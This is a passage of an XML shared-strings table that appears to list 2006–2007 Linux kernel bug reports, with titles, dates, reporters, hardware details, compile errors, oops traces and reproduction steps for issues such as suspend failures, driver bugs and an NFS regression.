    <t>2007-03-26 01:48 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: none? Distribution: Fedora Core 5 Hardware Environment: HP nw8000 Notebook (SMbus: 8086:24c3) Software Environment: Problem Description: Letting kernel load i2c_i801 causes s3 resume from mem to fail. Steps to reproduce: s3 resume works perfectly if I rename the module thus preventing it ever getting loaded, and doesn't work even if I boot to init=/bin/sh then insmod and rmmod it. I previously had the i2c_i801 compiled in and then the s3 resume never worked. Having merely loaded i2c_i801 causes it to jam hard before kernel ever gets started. Caps-lock, powerbutton, everything is dead, battery removal is the only option. That makes it awfully difficult for me to debug or send any relevant information. I've tried numerous kernels ranging from mid-2.6s to 2.6.16.11 and no change there. I even tried with the pec patch I saw on lkml (http://lkml.org/lkml/2006/4/19/68) but that seemed to have no impact. This was the key element for the bug 3599 atleast for us HP nw8000 users. I'm unable to test this on any other hardware that has acpi s3 support. I'll be glad to test patches or what ever needed. I just thought I'd let you know.</t>
  </si>
  <si>
    <t>2.6.16.11</t>
  </si>
  <si>
    <t>battery and AC status stops updating - HP Compaq nx6125</t>
  </si>
  <si>
    <t>2006-04-28 14:23 UTC</t>
  </si>
  <si>
    <t>Jure Repinc</t>
  </si>
  <si>
    <t>2006-06-30 17:01 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: not known Distribution: Gentoo Linux Hardware Environment: HP Compaq nx6125 laptop with AMD Turion 64 CPU, BIOS F.0E Software Environment: KDE 3.5.2 Problem Description: At some point battery and AC status just stops updating. This happens when I unplug the AC cable and when I start my laptop withiut being connected to AC power. I think that it is more likely to happen when I do something that uses a lot of CPU or Graphics power. Steps to reproduce: I can't tell you the exact steps as I didn't figure out what causes it to stop updating. Most of the time it stops working when I power on my laptop while travelling by train to the work and then at some point it justs stops updating. It also happens at one point when if keep plugginh and unplugging the laptop from AC power. High CPU usage at that time may help in causing this bug.</t>
  </si>
  <si>
    <t>gentoo-sources-2.6.16-gentoo-r4: compile/link error in fm801.c</t>
  </si>
  <si>
    <t>linux-2.6.17-rc4-git2</t>
  </si>
  <si>
    <t>2006-04-29 05:14 UTC</t>
  </si>
  <si>
    <t>2006-08-08 02:26 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: Distribution:Gentoo Hardware Environment: Software Environment: Problem Description: Steps to reproduce: UPD include/linux/compile.h CC init/version.o LD init/built-in.o LD vmlinux sound/built-in.o: In function `snd_fm801_free': fm801.c:(.text+0x4120b): undefined reference to `snd_tea575x_exit' sound/built-in.o: In function `snd_fm801_create': fm801.c:(.text+0x413c2): undefined reference to `snd_tea575x_init' make: *** [vmlinux] Error 1</t>
  </si>
  <si>
    <t>2.6.18-rc4</t>
  </si>
  <si>
    <t>acpi-cpufreq not working anymore</t>
  </si>
  <si>
    <t>since 2.6.16-rc1 and 2.6.15-mm2</t>
  </si>
  <si>
    <t>2006-05-01 14:37 UTC</t>
  </si>
  <si>
    <t>2007-03-08 00:08 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: 2.6.15-mm1 and 2.6.15 Distribution: Debian testing Hardware Environment: IBM Thinkpad T43 I reported on January 7th that acpi-cpufreq did not work anymore on my IBM Thinkpad T43 (fails to load with ENODEV). The problem appeared first in 2.6.15-mm2 and has been reported in the following thread on LKML: http://lkml.org/lkml/2006/1/7/181 The issue has been discussed a little bit with Len Brown and Venkatesh Pallipadi on linux-acpi, for instance in http://marc.theaimsgroup.com/?l=linux-acpi&amp;m=113770495819445&amp;w=2 and in private mails. Andrew Morton tracked the ENODEV down in this post http://marc.theaimsgroup.com/?l=linux-kernel&amp;m=113672322608497&amp;w=2 The last news I heard was that I should use speedstep-centrino since it is not broken and is actually faster. I now use speedstep-centrino and it works fine. But Andrew Morton does not like this solution. The acpi-cpufreq driver should either fixed or removed. That's why I am opening a bug here.</t>
  </si>
  <si>
    <t>shuttle_usbat: HP CDRW device detection broken</t>
  </si>
  <si>
    <t>2006-05-01 15:22 UTC</t>
  </si>
  <si>
    <t>2006-07-02 08:44 UTC</t>
  </si>
  <si>
    <t>At Andrew's request, heres a place to track this bug. The driver probes the device on plugin to detect whether it is a compactflash-reader or a HP CD writer. This probing has been a real pain to get right - no matter how we do it, some users seem to find that their devices are being detected as the wrong thing. Right now I believe we're the best we ever have been, but there are a few people with HP CD writers who have reported their devices are identified as CF-readers. The solution I am going to settle for is where we hardcode the USB ID's for HP CD devices to be detected as CD's. The devices using the other ID (which is shared between both flash and CD devices) will continue to have the current probe routine. I have asked Peter Chubb to adapt his earlier patch to do this, but I'll do it myself if he doesn't do that soon (would like to see this fixed for 2.6.18). There is also a problem related to the SCSI command handling which prevents the device from working correctly even after detection has been temporarily hardcoded. Peter Chubb has a patch for this, which I'll send on soon.</t>
  </si>
  <si>
    <t>rmmod powernow_k8 BUG</t>
  </si>
  <si>
    <t>2.6.17-rc3-git2</t>
  </si>
  <si>
    <t>2006-05-02 01:08 UTC</t>
  </si>
  <si>
    <t>2006-06-26 04:57 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: 2.6.17-rc3-mm1 Distribution: Debian/unstable Hardware Environment: AMD Turion(tm) 64 Mobile Technology ML-30 Software Environment: Problem Description: Steps to reproduce: % sync &amp;&amp; modprobe powernow_k8 results in powernow-k8: Found 1 AMD Athlon 64 / Opteron processors (version 1.60.2) powernow-k8: 0 : fid 0x0 (800 MHz), vid 0x12 (1100 mV) powernow-k8: 1 : fid 0x8 (1600 MHz), vid 0x4 (1450 mV) cpu_init done, current fid 0x8, vid 0x2 powernow-k8: ph2 null fid transition 0x8 and a subsequent % sync &amp;&amp; rmmod powernow_k8 BUG: unable to handle kernel NULL pointer dereference at virtual address 0000002c printing eip: dcda3b09 *pde = 00000000 Oops: 0000 [#1] PREEMPT Modules linked in: powernow_k8 freq_table radeon drm thermal fan button processor ac battery af_packet ide_scsi sata_sil libata scsi_mod eeprom saa7134_dvb mt352 saa7134 compat_ioctl32 v4l2_common v4l1_compat ir_kbd_i2c ir_common videodev video_buf_dvb dvb_core video_buf nxt200x dvb_pll tda1004x usbhid usbmouse tsdev 8250_pci pcmcia firmware_class rt2500 8250 yenta_socket serial_core psmouse evdev rsrc_nonstatic pcmcia_core 8139too ehci_hcd ohci_hcd ide_cd usbcore ati_agp agpgart snd_atiixp_modem snd_atiixp snd_ac97_codec snd_ac97_bus snd_pcm snd_timer snd soundcore snd_page_alloc cdrom unix CPU: 0 EIP: 0060:[&lt;dcda3b09&gt;] Not tainted VLI EFLAGS: 00010286 (2.6.17-rc3-git2 #1) EIP is at acpi_processor_unregister_performance+0x1e/0x3e [processor] eax: 00000000 ebx: da498400 ecx: 00000001 edx: 00000000 esi: da0bed80 edi: 00000286 ebp: da0bee0c esp: d97e8f1c ds: 007b es: 007b ss: 0068 Process rmmod (pid: 5075, threadinfo=d97e8000 task=d7891570) Stack: &lt;0&gt;d02c2dc0 dcdad4e6 da0bed80 da0beda8 c02973d2 c03aef48 c034dd4c c034b01c c034b000 c0275c47 00000880 dcdaf100 00000000 d97e8000 c02960f5 c01366e6 65776f70 776f6e72 00386b5f cf439e34 c0149f89 b7f6a000 dae58900 c014b3b8 Call Trace: &lt;dcdad4e6&gt; powernowk8_cpu_exit+0x26/0x50 [powernow_k8] &lt;c02973d2&gt; cpufreq_remove_dev+0xb2/0x120 &lt;c0275c47&gt; sysdev_driver_unregister+0x67/0x80 &lt;c02960f5&gt; cpufreq_unregister_driver+0x25/0x60 &lt;c01366e6&gt; sys_delete_module+0x146/0x1c0 &lt;c0149f89&gt; remove_vma+0x39/0x50 &lt;c014b3b8&gt; do_munmap+0x198/0x1f0 &lt;c0102f2b&gt; syscall_call+0x7/0xb Code: 01 00 00 31 c0 83 c4 2c 5b 5e 5f 5d c3 53 ff 0d e0 60 da dc 0f 88 f8 01 00 00 8b 1c 95 8c 62 da dc 85 db 74 18 8b 83 6c 02 00 00 &lt;8b&gt; 40 2c e8 0f 26 3b e3 c7 83 6c 02 00 00 00 00 00 00 ff 05 e0 EIP: [&lt;dcda3b09&gt;] acpi_processor_unregister_performance+0x1e/0x3e [processor] SS:ESP 0068:d97e8f1c</t>
  </si>
  <si>
    <t>hdaps driver support for new Lenovo laptops</t>
  </si>
  <si>
    <t>2006-05-02 05:27 UTC</t>
  </si>
  <si>
    <t>Jeff Grafton</t>
  </si>
  <si>
    <t>2006-10-01 00:56 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: never Distribution: any Hardware Environment: new Lenovo (formerly IBM) laptops, including the ThinkPad T60 Software Environment: any Problem Description: The hdaps driver does not recognize the new Lenovo laptops as being supported. This is due to two problems: - First, the manufacturer given in the DMI is now "Lenovo" instead of "IBM." - Second, the model "T60" was not recognized as a valid model name. Steps to reproduce: Install the hdaps module into the kernel. It will complain about an unsupported laptop.</t>
  </si>
  <si>
    <t>Transmitter of CK804 hangs and cannot be reset (except by power-cycling it)</t>
  </si>
  <si>
    <t>2006-05-02 06:06 UTC</t>
  </si>
  <si>
    <t>Ingo Oeser</t>
  </si>
  <si>
    <t>2007-07-24 06:01 UTC</t>
  </si>
  <si>
    <t>Ayaz Abdulla</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: Distribution: Debian sarge Hardware Environment: Tyan NF-CK804, AMD Athlon(tm) 64 Processor 3200+, CK804 Ethernet Controller (the Problem), More see attachment Software Environment: Services: Routing, Firewalling, Mail, Proxy Problem Description: After a while the transmitter of the CK804 NIC hangs and recovers only after reboot. The netdev watchdog cannot successfully reset the NIC. Steps to reproduce: No usage pattern detected so far. Happens after more than one day usage. Cabling is Cat5 crossover connection to one LAN-port of a "Sonicwall TZ170 Enhanced". Cables and machines were replaced with no luck. Using the other Onboard NIC here (the Net-Extreme) helps. The same combination with a Cisco switch between the Sonicwall and the CK804-NIC works without problems (at least since 2.6.13.4).</t>
  </si>
  <si>
    <t>High Speed USB devices don't work when ehci_hcd loaded (nforce4)</t>
  </si>
  <si>
    <t>2006-05-03 14:22 UTC</t>
  </si>
  <si>
    <t>Jan Christoph uhde</t>
  </si>
  <si>
    <t>2006-11-29 19:10 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: 2.6.17-rc3 Distribution: debian/unstable Hardware Environment: amd64 &amp;&amp; a8n-premium Probably copy of Bug: 5835|6201 Steps to reproduce: Boot the system with a kernel wich has ehci_hcd enabled and plug the device in any usb port.</t>
  </si>
  <si>
    <t>Overflow on 32bit archs in page_alloc.c, setup_per_zone_pages_min</t>
  </si>
  <si>
    <t>2006-05-04 05:39 UTC</t>
  </si>
  <si>
    <t>ake.sandgren</t>
  </si>
  <si>
    <t>2007-02-21 09:24 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: Distribution: Hardware Environment: Systems with 896MB of memory or more Software Environment: Problem Description: There is a unsigned long overflow in page_alloc.c in setup_per_zone_pages_min. unsigned long tmp; spin_lock_irqsave(&amp;zone-&gt;lru_lock, flags); tmp = (pages_min * zone-&gt;present_pages) / lowmem_pages; If min_free_kbytes is changed to a value slightly larger then 76260 the tmp = (... calculation will overflow on a 32bit arch resulting in setting pages_min for the normal zone to a bad value. There is no check in min_free_kbytes_sysctl_handler to cap min_free_kbytes to prevent this from happening. something like tmp = (pages_min * (zone-&gt;present_pages &gt;&gt; 3))/(lowmem_pages &gt;&gt; 3) will give the same result +- 1 page without overflowing for larger min_free_kbytes. Steps to reproduce: Look at /proc/zoneinfo increase min_free_kbytes to 131072 Look at /proc/zoneinfo</t>
  </si>
  <si>
    <t>Suspend to ram regression 2.6.17-rc6</t>
  </si>
  <si>
    <t>2.6.17-rc6</t>
  </si>
  <si>
    <t>2006-05-04 12:02 UTC</t>
  </si>
  <si>
    <t>Erik Slagter</t>
  </si>
  <si>
    <t>2006-06-25 19:59 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: 2.6.16.1 Distribution: FC4/5 (vanilla kernel) Hardware Environment: Dell Inspiron 9300 laptop Software Environment: Fedore Core 5 Problem Description: Suspend to ram broken 2.6.16-git19 during suspend says: "kernel tried to execute NX-protected page - exploit attempt? (uid 0) BUG: unable to handle kernel paging request at virtual address c04ce31" Complete OOPS at request. 2.6.17-rc3 completes the suspend cycle (although it complains about usb_hcd) but cannot be woken properly; the fans start to run, leds light, keyboard caps lock key/led combo work, but nothing else. No display, no ip, no USB keyboard (so gathering info using ssh or similar is not possible). Steps to reproduce: #!/bin/sh logger -t acpi-suspend "acpi-suspend $*" state=3 killall vncviewer xvncviewer gaim service openvpn stop ifconfig tap0 down service ntpd stop service network stop service cups stop hwclock --systohc --utc sync sync echo "${state}" &gt; /proc/acpi/sleep logger -t acpi-suspend "awake from acpi-suspend" hwclock --hctosys --utc service network start service ntpd start service cups start</t>
  </si>
  <si>
    <t>SIOCSIFHWBROADCAST needs compat layer</t>
  </si>
  <si>
    <t>2006-05-06 08:24 UTC</t>
  </si>
  <si>
    <t>2006-10-22 07:36 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: all kernels has this problem; I've tested 2.6.8, 2.6.9, 2.6.15 Distribution: Hardware Environment: ethernet interface Software Environment: 32-bit libc with 64-bit kernel Problem Description: 32-bit program running with 64-bit kernel fails to set hardware broadcast address via ioctl(SIOCSIFHWBROADCAST). Steps to reproduce: Compile the following sample program: #include &lt;stdio.h&gt; #include &lt;errno.h&gt; #include &lt;sys/ioctl.h&gt; #include &lt;sys/types.h&gt; #include &lt;sys/socket.h&gt; #include &lt;linux/if.h&gt; main() { int s = socket(AF_INET, SOCK_DGRAM, 0); struct ifreq req; int rc; if (s &lt; 0) { perror("failed to open socket"); return -1; } strcpy(req.ifr_name, "eth0"); req.ifr_hwaddr.sa_family = AF_LOCAL; memset(req.ifr_hwaddr.sa_data, 0xff, 6); rc = ioctl(s, SIOCSIFHWBROADCAST, &amp;req); if (rc != 0) { perror("ioctl failed"); return -1; } printf("ioctl(SIOCSIFHWBROADCAST) passed\n"); return 0; } When compiled to 64-bit binary, it works OK: ioctl(SIOCSIFHWBROADCAST) passed When compiled to 32-bit binary, it does not work: ioctl failed: Invalid argument</t>
  </si>
  <si>
    <t>reiser4_delete_inode BUG at fs/inode.c:251</t>
  </si>
  <si>
    <t>2.6.17-rc3-mm1</t>
  </si>
  <si>
    <t>2006-05-06 09:56 UTC</t>
  </si>
  <si>
    <t>2006-07-13 12:40 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: 2.6.16-mm1 Distribution: home-rolled Hardware Environment: Athlon XP Software Environment: root is reiser4 on RAID-1 on IDE Problem Description: Reproducible BUG related to deleting files on reiser4 Steps to reproduce: Boot. Try to compile wmwifi package (or probably anything else).</t>
  </si>
  <si>
    <t>Michael Buesch</t>
  </si>
  <si>
    <t>2.6.17-rc3-git14</t>
  </si>
  <si>
    <t>litelink-sir.c:(.text+0xd7111): undefined reference to `sirdev_set_dtr_rts'</t>
  </si>
  <si>
    <t>2006-05-08 02:43 UTC</t>
  </si>
  <si>
    <t>2006-05-25 06:01 UTC</t>
  </si>
  <si>
    <t>Samuel Ortiz</t>
  </si>
  <si>
    <t>compile error : drivers/pci/hotplug/pciehp_hpc.c:44</t>
  </si>
  <si>
    <t>linux-2.6.17-rc3-git14</t>
  </si>
  <si>
    <t>2006-05-08 03:35 UTC</t>
  </si>
  <si>
    <t>2006-08-23 14:38 UTC</t>
  </si>
  <si>
    <t>CC drivers/pci/hotplug/pciehp_core.o CC drivers/pci/hotplug/pciehp_ctrl.o CC drivers/pci/hotplug/pciehp_pci.o CC drivers/pci/hotplug/pciehp_hpc.o In file included from drivers/pci/hotplug/pciehp_hpc.c:44: include/linux/pci-acpi.h:54: error: redefinition of typedef 'acpi_status' include/acpi/actypes.h:350: error: previous declaration of 'acpi_status' was here In file included from drivers/pci/hotplug/pciehp_hpc.c:44: include/linux/pci-acpi.h:55:1: warning: "AE_ERROR" redefined In file included from include/acpi/acpi.h:56, from drivers/pci/hotplug/pciehp_hpc.c:41: include/acpi/acexcep.h:65:1: warning: this is the location of the previous definition make[3]: *** [drivers/pci/hotplug/pciehp_hpc.o] Error 1 make[2]: *** [drivers/pci/hotplug] Error 2 make[1]: *** [drivers/pci] Error 2 make: *** [drivers] Error 2</t>
  </si>
  <si>
    <t>ACPI-CA memory leak due to optionally stored AML Object passed through "child" Method</t>
  </si>
  <si>
    <t>2006-05-08 04:32 UTC</t>
  </si>
  <si>
    <t>fiodor.f.suietov</t>
  </si>
  <si>
    <t>2006-12-02 10:47 UTC</t>
  </si>
  <si>
    <t>A8N-VM-CSM hangs network and usb when using ACPI</t>
  </si>
  <si>
    <t>plain 2.6.15, and with forcedeth 0.54 from git</t>
  </si>
  <si>
    <t>2006-05-08 05:44 UTC</t>
  </si>
  <si>
    <t>2009-04-30 15:21 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: ? Distribution: debian Hardware Environment: Asus A8N-VM-CSM. Software Environment: PXE boot, with debian as base Problem Description: Network connection gets lost after some time. We're using rsync to transfer about 1.5GB of data to PXE-booted clients. Works fine with all machines, except above mentioned motherboard. Messages from dmesg: forcedeth 01043:81d3 bound to 0:0:14.0; latency timer=64 Uses HighDMA lspci -v says: bridge: nvidia corp. unkn. dev. 0269 (rev a1) subsystem: asus tech. inc. unknown dev 81d3 flags: bus master, 66Mhz, fast devsel, latency 0, irq 5, mem at febd7000, 32bit, non-prefetchable [size=4k] ioports at d080 [size=8] cap. [44 power management v2] [50 msg signalled interrupt) [64+ queue=0/2 enable-] cap. [6c #08[a802]] For testing I put the current git forcedeth.c (0.54) into 2.6.15; it got a bit further, but stopped again. Steps to reproduce: - Boot the system - PXE, DHCP - Generate network load (here rsync, with ~1.5GB data) - Network lost after 5-400MB. Never more, no messages in dmesg. - ethtool says 100MBits, Full Duplex, AutoNeg on (before and after hang). Just like it should (Identical with switch configuration). Other PCs on the same network cable work fine.</t>
  </si>
  <si>
    <t>2.6.17.6</t>
  </si>
  <si>
    <t>traffic freezes when sending large amount of data over pptp</t>
  </si>
  <si>
    <t>2006-05-10 02:19 UTC</t>
  </si>
  <si>
    <t>xeb</t>
  </si>
  <si>
    <t>2007-06-09 10:54 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: Distribution: gentoo 2005.1 Hardware Environment: i386 (Intel(R) Celeron(R) M processor 1.40GHz), RAM 256M Software Environment: Problem Description: Hello. I tried to setup pptp (pptpd) service on my linux box, but it don't work correctly. Problem: traffic freezes when sending large amount of data. I find lack in ppp_async.c. /* try to push more stuff out */ if (test_bit(XMIT_WAKEUP, &amp;ap-&gt;xmit_flags) &amp;&amp; ppp_async_push(ap)) ppp_output_wakeup(&amp;ap-&gt;chan); ----&gt;&gt; I added this lines and pptpd starts work. else { if (test_bit(XMIT_FULL, &amp;ap-&gt;xmit_flags)) ppp_asynctty_wakeup(ap-&gt;tty); }</t>
  </si>
  <si>
    <t>Rainer Malitzke-Goes</t>
  </si>
  <si>
    <t>dummy_hcd.c:compile error</t>
  </si>
  <si>
    <t>2.6.17-rc3-git18</t>
  </si>
  <si>
    <t>2006-05-11 02:45 UTC</t>
  </si>
  <si>
    <t>2006-08-03 03:56 UTC</t>
  </si>
  <si>
    <t>During make I got this: ... CC init/version.o LD init/built-in.o LD .tmp_vmlinux1 drivers/built-in.o: In function `dummy_pullup': drivers/usb/gadget/dummy_hcd.c:197: undefined reference to `usb_hcd_poll_rh_status' drivers/built-in.o: In function `usb_gadget_register_driver': drivers/usb/gadget/dummy_hcd.c:197: undefined reference to `usb_hcd_poll_rh_status' drivers/built-in.o: In function `usb_gadget_unregister_driver': drivers/usb/gadget/dummy_hcd.c:197: undefined reference to `usb_hcd_poll_rh_status' drivers/built-in.o: In function `dummy_udc_suspend': drivers/usb/gadget/dummy_hcd.c:197: undefined reference to `usb_hcd_poll_rh_status' drivers/built-in.o: In function `dummy_udc_resume': drivers/usb/gadget/dummy_hcd.c:197: undefined reference to `usb_hcd_poll_rh_status' drivers/built-in.o: In function `dummy_urb_enqueue': drivers/usb/gadget/dummy_hcd.c:1014: undefined reference to `usb_get_dev' drivers/built-in.o: In function `dummy_timer': drivers/usb/gadget/dummy_hcd.c:197: undefined reference to `usb_hcd_giveback_urb' drivers/usb/gadget/dummy_hcd.c:1550: undefined reference to `usb_put_dev' drivers/built-in.o: In function `dummy_hub_status': drivers/usb/gadget/dummy_hcd.c:1593: undefined reference to `usb_hcd_resume_root_hub' drivers/built-in.o: In function `dummy_hub_control': drivers/usb/gadget/dummy_hcd.c:1750: undefined reference to `usb_hcd_poll_rh_status' drivers/built-in.o: In function `dummy_hcd_probe': drivers/usb/gadget/dummy_hcd.c:1920: undefined reference to `usb_create_hcd' drivers/usb/gadget/dummy_hcd.c:1925: undefined reference to `usb_add_hcd' drivers/usb/gadget/dummy_hcd.c:1927: undefined reference to `usb_put_hcd' drivers/built-in.o: In function `dummy_hcd_remove': drivers/usb/gadget/dummy_hcd.c:1938: undefined reference to `usb_remove_hcd' drivers/usb/gadget/dummy_hcd.c:1939: undefined reference to `usb_put_hcd' drivers/built-in.o: In function `dummy_hcd_resume': drivers/usb/gadget/dummy_hcd.c:1970: undefined reference to `usb_hcd_poll_rh_status' drivers/built-in.o: In function `init': drivers/usb/gadget/dummy_hcd.c:2015: undefined reference to `usb_disabled' make: *** [.tmp_vmlinux1] Error 1 These are some relevant config settings: $&gt; grep -i -e hcd config.rnd.3 | grep -v '^#' CONFIG_USB_ARCH_HAS_HCD=y CONFIG_USB_OHCI_HCD=m CONFIG_USB_UHCI_HCD=m CONFIG_USB_GADGET_DUMMY_HCD=y CONFIG_USB_DUMMY_HCD=y</t>
  </si>
  <si>
    <t>#ifdef CONFIG_PM causes MPT to not compile</t>
  </si>
  <si>
    <t>2.6.17-rc4</t>
  </si>
  <si>
    <t>2006-05-12 07:49 UTC</t>
  </si>
  <si>
    <t>2006-08-16 04:51 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: 2.6.17-rc3 Distribution: slack Hardware Environment: i386 Software Environment: gcc 3.3 Problem Description: /drivers/message/fusion/mpt* using #ifdef CONFIG_PM are not exporting the mpt_suspend mpt_resume. I do not know why we would want to exercise power management on high-performance scsi controllers in the first place. LSI controllers are server devices. Steps to reproduce: compile the kernel. causes a kernel compilation failure. Steps to fix: comment out the #ifdef CONFIG_pm and corresponding #endif to disable this compilation flag. recompile and the world is happy.</t>
  </si>
  <si>
    <t>memory.c:(.text+0x4cb21): undefined reference to `remove_memory'</t>
  </si>
  <si>
    <t>2006-05-12 12:09 UTC</t>
  </si>
  <si>
    <t>2006-05-13 08:48 UTC</t>
  </si>
  <si>
    <t>Playing with different kernel configs I got: ... UPD include/linux/compile.h CC init/version.o LD init/built-in.o LD .tmp_vmlinux1 drivers/built-in.o: In function `memory_block_action': memory.c:(.text+0x4cb21): undefined reference to `remove_memory' make: *** [.tmp_vmlinux1] Error 1</t>
  </si>
  <si>
    <t>TTY-Logging doesn't work</t>
  </si>
  <si>
    <t>2006-05-13 06:53 UTC</t>
  </si>
  <si>
    <t>Daniel 'DaB.' Baur</t>
  </si>
  <si>
    <t>2007-09-03 23:40 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: No idea Distribution: Debian Sarge Hardware Environment:Pentium III with 321012k RAM Software Environment: Problem Description: I can't find an option "CONFIG_TTY_LOG" in the .config-file or in the menuconfig. http://lkml.org/lkml/2006/3/24/225 says, that the logging has moved, but I find no way, to enable it. Steps to reproduce:</t>
  </si>
  <si>
    <t>System reboot when bringing CPU1 back online with CONFIG_VMSPLIT_2G hotplu</t>
  </si>
  <si>
    <t>2.6.19</t>
  </si>
  <si>
    <t>2006-05-13 07:07 UTC</t>
  </si>
  <si>
    <t>Antony J Mee</t>
  </si>
  <si>
    <t>2006-12-25 21:15 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: Unknown. But also failed (but rather by hanging with vanilla 2.6.15 sources) Distribution: Gentoo Hardware Environment:Intel Core Duo (2ghz) processor : 0 vendor_id : GenuineIntel cpu family : 6 model : 14 model name : Genuine Intel(R) CPU T2500 @ 2.00GHz stepping : 8 cpu MHz : 1000.000 cache size : 2048 KB physical id : 0 siblings : 2 core id : 0 cpu cores : 2 fdiv_bug : no hlt_bug : no f00f_bug : no coma_bug : no fpu : yes fpu_exception : yes cpuid level : 10 wp : yes flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe nx constant_tsc pni monitor vmx est tm2 xtpr bogomips : 4011.66 processor : 1 ~snip~ Software Environment: Problem Description: Using cpu hotplugging to turn off one cpu results in a system reboot when the cpu is later brought back online. The same system reboot is seen when using software suspend which appears to take all cpus down on suspend and then after brings up the cpus individually at the very end of the resume process. Steps to reproduce: Compile kernel with SMP, CONFIG_VMSPLIT_2G and CPU hotplugging As root do, echo 0 &gt; /sys/devices/system/cpu/cpu1/online (System will continue running with only one cpu, cpu0) then do echo 1 &gt; /sys/devices/system/cpu/cpu1/online system reboots. With CONFIG_VMSPLIT_3G the system continues running. (CONFIG_SPLIT_ relation was discovered by Nathan Lynch.</t>
  </si>
  <si>
    <t>acpi_gbl_global_list randomly gets corroputed</t>
  </si>
  <si>
    <t>2.6.16 and later</t>
  </si>
  <si>
    <t>2006-05-14 05:50 UTC</t>
  </si>
  <si>
    <t>I got a weird random NULL pointer in acpi_ut_find_allocation. My investigation shows that the acpi_gbl_global_list somehow got corrupted between : exconfig.c: acpi_ex_load_op: table_ptr = ACPI_MEM_ALLOCATE (table_header.length); And tbinstal.c : acpi_tb_init_table_descriptor: table_desc = ACPI_MEM_CALLOCATE (sizeof(struct acpi_table_desc)); For example: The corrupted list had a internal node (dfef1200) with prev pointer == 0x0 (Wrong) next pointer == dff09600 And node (dff09600) with prev pointer == 0x0 (Wrong) next pointer == 182 (Wrong) XXXX: This cause kernel NULL pointer panic. The interesting thing is if the value of table_ptr allocated for the first SSDT was larger than the successor by 0x200, then the corresponding node for the first SSDT on the acpi_gbl_global_list would be corrupted. Otherwise, everything is just ok. For example, dfe72c00 was allocated for the first SSDT, dfe72a00 was allocated for the second SSDT, then, I observed the node dfe72c00 corrupted. So, it looks like the execution of code from exconfig.c: acpi_ex_load_op: table_ptr = ACPI_MEM_ALLOCATE (table_header.length); to tbinstal.c : acpi_tb_init_table_descriptor: table_desc = ACPI_MEM_CALLOCATE (sizeof(struct acpi_table_desc)); for the second SSDT unexpectedly changed the node for the first SSDT on the acpi_gbl_global_list. But, how? Or there are other tricks? I will debug further..., and stay tuned. Thanks, Luming ps: The following are the log for the failed and successful boot. Failed Log ... acpi_ex_load_op: table_ptr=dff0a228 SSDT located at dff0a228 Parsing all Control Methods: Table [SSDT](id 0086) - 5 Objects with 0 Devices 3 Methods 0 Regions table_header.length = 470 acpi_ex_load_op: table_ptr=dff0a028 BUG: unable to handle kernel NULL pointer dereference at virtual address 0000018 6 printing eip: c0227068 *pde = 00000000 Oops: 0000 [#1] SMP . Successful Log ... table_header.length = 422 acpi_ex_load_op: table_ptr=c1944028 SSDT located at c1944028 Parsing all Control Methods: Table [SSDT](id 0086) - 5 Objects with 0 Devices 3 Methods 0 Regions table_header.length = 470 acpi_ex_load_op: table_ptr=c198be28 SSDT located at c198be28 Parsing all Control Methods: Table [SSDT](id 0087) - 1 Objects with 0 Devices 1 Methods 0 Regions ACPI: CPU0 (power states: C1[C1] C2[C2]) ACPI: Processor [CPU0] (supports 8 throttling states) table_header.length = 135 acpi_ex_load_op: table_ptr=dfee67a8 SSDT located at dfee67a8 Parsing all Control Methods: Table [SSDT](id 008B) - 3 Objects with 0 Devices 3 Methods 0 Regions table_header.length = 133 acpi_ex_load_op: table_ptr=dfee66a8 SSDT located at dfee66a8 Parsing all Control Methods: Table [SSDT](id 008C) - 1 Objects with 0 Devices 1 Meth</t>
  </si>
  <si>
    <t>2.6.16.16</t>
  </si>
  <si>
    <t>NFS client (10x) performance regression 2.6.14.7 -&gt; all later kernels</t>
  </si>
  <si>
    <t>2006-05-15 06:11 UTC</t>
  </si>
  <si>
    <t>2006-08-28 05:24 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: 2.6.14.7 Distribution: Debian GNU/Linux 3.1 (Sarge) Hardware Environment: NFSv3 server on dual opteron NFSv3 clients on dual PIII or Opteron or even VMWare Software Environment: Attached nfsbench program which exposes the problem, other than that, standard Debian installations. The problem can even be triggered with an old Red Hat inside VMWare. Problem Description: Certain I/O patterns will run horribly slow due to a cache bug in the NFS client code in kernels later than 2.6.14.7. Especially GNU ld (the linker) will expose this problem - link jobs on large files run 10-50 times slower on kernels newer than 2.6.14.7 than they did on older kernels. The attached nfsbench program exposes the problem too, by sort-of exercising the same I/O pattern as GNU ld. Steps to reproduce: 1) You need an NFS server and an NFS client. 2) Compile the test program: gcc -o nfsbench nfsbench.c 3) On the NFS client, execute the test program 100 times: for i in `seq 1 100`; do ./nfsbench; done On a good kernel, all runs will complete in roughly a second each. On a bad kernel, *most* (but not necessarily all) runs will take roughly one minute to execute. The attached patch seems to fix the problem.</t>
  </si>
  <si>
    <t>2.6.16 kernels unstable with Adaptec 2100 SCSI RAID</t>
  </si>
  <si>
    <t>2006-05-15 14:32 UTC</t>
  </si>
  <si>
    <t>Dave R</t>
  </si>
  <si>
    <t>2006-06-10 11:25 UTC</t>
  </si>
  <si>
